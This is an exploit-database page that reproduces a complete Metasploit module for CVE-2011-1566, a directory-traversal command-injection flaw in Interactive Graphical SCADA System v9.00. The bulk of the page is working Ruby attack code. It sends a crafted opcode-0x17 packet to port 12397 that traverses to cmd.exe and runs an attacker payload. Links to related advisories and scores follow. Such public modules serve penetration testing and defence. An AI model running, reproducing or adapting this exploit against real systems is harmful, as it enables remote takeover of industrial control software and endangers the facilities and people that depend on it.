Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-21402
HistoryOct 22, 2013 - 12:00 a.m.

Interactive Graphical SCADA System Remote Command Injection

2013-10-2200:00:00
metasploit
0day.today
20

0.883 High

EPSS

Percentile

98.7%

JSON

This Metasploit module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',
      'Description'    => %q{
          This module abuses a directory traversal flaw in Interactive
        Graphical SCADA System v9.00. In conjunction with the traversal
        flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
        may be able to execute arbitrary system commands.
      },
      'Author'         =>
        [
          'Luigi Auriemma',
          'MC'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1566'],
          [ 'OSVDB', '72349'],
          [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 153,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows', {} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 21 2011'))

    register_options(
      [
        Opt::RPORT(12397)
      ], self.class)
  end

  def exploit

    print_status("Sending exploit packet...")

    connect

    packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
    packet << [0x00000100].pack('V') + [0x00000017].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V')
    packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
    packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
    packet << "\x00" * (143) #

    sock.put(packet)
    sock.get_once(-1,0.5)
    disconnect

  end

end

#  0day.today [2018-01-02]  #

Related

packetstorm 1
nvd 1
openvas 1
cve 1
checkpoint_advisories 1
prion 1
cvelist 1
saint 4
packetstorm
packetstorm
Interactive Graphical SCADA System Remote Command Injection
2013-10-22 00:00:00
nvd
nvd
CVE-2011-1566
2011-04-05 15:19:36
openvas
openvas
7T Interactive Graphical SCADA System 'dc.exe' Command Injection Vulnerability
2014-09-25 00:00:00
cve
cve
CVE-2011-1566
2011-04-05 15:19:36
checkpoint_advisories
checkpoint_advisories
7T Interactive Graphical SCADA System Arbitrary File Execution (CVE-2011-1566)
2011-08-23 00:00:00
prion
prion
Directory traversal
2011-04-05 15:19:00
cvelist
cvelist
CVE-2011-1566
2011-04-05 15:00:00
saint
saint
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00

0.883 High

EPSS

Percentile

98.7%

JSON
Related for 1337DAY-ID-21402
packetstorm1nvd1openvas1cve1checkpoint_advisories1prion1cvelist1saint4